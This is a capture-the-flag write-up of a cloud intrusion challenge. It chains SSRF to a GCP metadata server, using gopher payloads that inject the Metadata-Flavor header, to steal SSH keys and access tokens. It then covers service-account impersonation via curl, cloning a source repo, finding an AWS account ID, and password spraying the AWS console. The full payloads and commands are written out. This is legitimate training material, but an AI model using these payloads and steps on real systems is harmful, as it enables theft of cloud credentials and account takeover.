Infiltrate (open the gate)

Solve

When clicking the refresh, we can see that the web app sends a POST request with a local url as feed. This is a very classical SSRF vulenrability that we see in cloud CTF.

We are also able to get local file read by changing the protocol to file://

From the source code, we can see that there is blacklisting along with sanitization involved, so we are not able to get RCE. When attempting to query the metadata instances, I receive an error message that we are missing the request header metadata flavour.

However while doing research, I came accross this technique on payloadallthething, which uses the gopher protocol to embed a request header.

gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a

By copying the payload, we are able to list the SSH keys succesfully as a proof of concept.

listing the ssh key

Next, I enumerated the metadata and get the access token.

gopher%3A%2F%2Fmetadata%2Egoogle%2Einternal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fservice%2Daccounts%2Fdefault%2Ftoken%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata%2Egoogle%2Einternal%250AAccept%3A%2520%252a%252f%252a%250aMetadata%2DFlavor%3A%2520Google%250d%250a
getting access token

From here i was stuck for quite a while, trying to use the access token to enumerate the mp-compute2 service account permission. It was until I dm an admin for hint that I was able to progress.

So apparantly GCP Brute does not run the Test IAM Permissions on a different service account, and we have to manually enumerate via APIs.

  curl -X POST \
    -H "Authorization: Bearer $at" \
    -H "Content-Type: application/json" \
    --data '{
      "permissions": ["iam.serviceAccounts.getAccessToken"]
    }' \
    "https://iam.googleapis.com/v1/projects/-/serviceAccounts/[email protected]:testIamPermissions"
  
checking if mp-compute2 has permissions over cloud-source

The cloud source service account is from the enumeration we performed earlier.

Since the mp-compute2 is able to get access token for cloud-source, lets get the access token and enumerate cloud-source service account permission.

curl -X POST \
  -H "Authorization: Bearer $at" \
  -H "Content-Type: application/json" \
  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/[email protected]:generateAccessToken" \
  -d '{
    "scope": [
      "https://www.googleapis.com/auth/cloud-platform"
    ],
    "lifetime": "3600s"
  }'
getting the access token

With the new access token, lets enumerate the service account permission.

Bruteforcing permissions

From the output, we can see that the service account has permission over cloud source repository. Cloud source repository is basically Google cloud version of GitHub.

So lets enumerate the cloud source.

Setting environment variable to use gcloud cli with the access token

Enumerating cloud source repos.

gcloud source repos list

Cloning the repo.

gcloud source repos clone wholesale-distribution

Looking at the code of cloned repo, it seems to just be a static HTML code. The only interesting part is that theres a public s3 bucket.

However, while enumerating the public bucket, all the files are standard libraries without anything interesting.

Thats when I recall a lab that I had done before, which is to extract the Account ID from a S3 bucket and do further enumeration with the Account ID.

I will not be elaborating on the process of setting up the IAM user and policy, you can refer to the lab that was linked, or find similar article wihtin the reference.

Here, I used s3-account-search to enumerate the Account ID, then used a curl request with the x-amz-expected-bucket-ownerto verify.

s3-account-search arn:aws:iam::[MY AWS ACCOUNT ID]:role/s3_attacker_role  it-storage-3562577

curl -X GET "https://it-storage-3562577.s3.amazonaws.com" \
-H "x-amz-expected-bucket-owner: 975050229156"

If the Account ID is wrong, we will get an access denied instead.

Next, Ill be spraying with GOAWSConsoleSpray again, with the username and password wordlist we saved previously. I managed to find a credential for haru with a reused password.

Lets enumerate recently visited service to see if theres anything interesting.

Looking at lambda, it looks like we have access over the function haru_test

Looking at the code source, we are able to retrieve the flag.

TLDR

  • Utilize parthaban credentials on the web application to authenticate

  • Attack the web app with SSRF, using the gopher protocol to append the Metadata-Flavourheader

  • Use testIamPermission on getAccessTokenagainst other service account to perform lateral movement

  • Lateral movement to cloud-source service account

  • Enumerate Google Cloud Source and download the Repository

  • Utilize s3-account-search to retrieve AWS Account ID

  • Utilize GoAWSConsoleSpray to spray AWS Console with the newly retrieved Account ID

  • Retrieve the flag from AWS Lambda

Reference

Last updated

Was this helpful?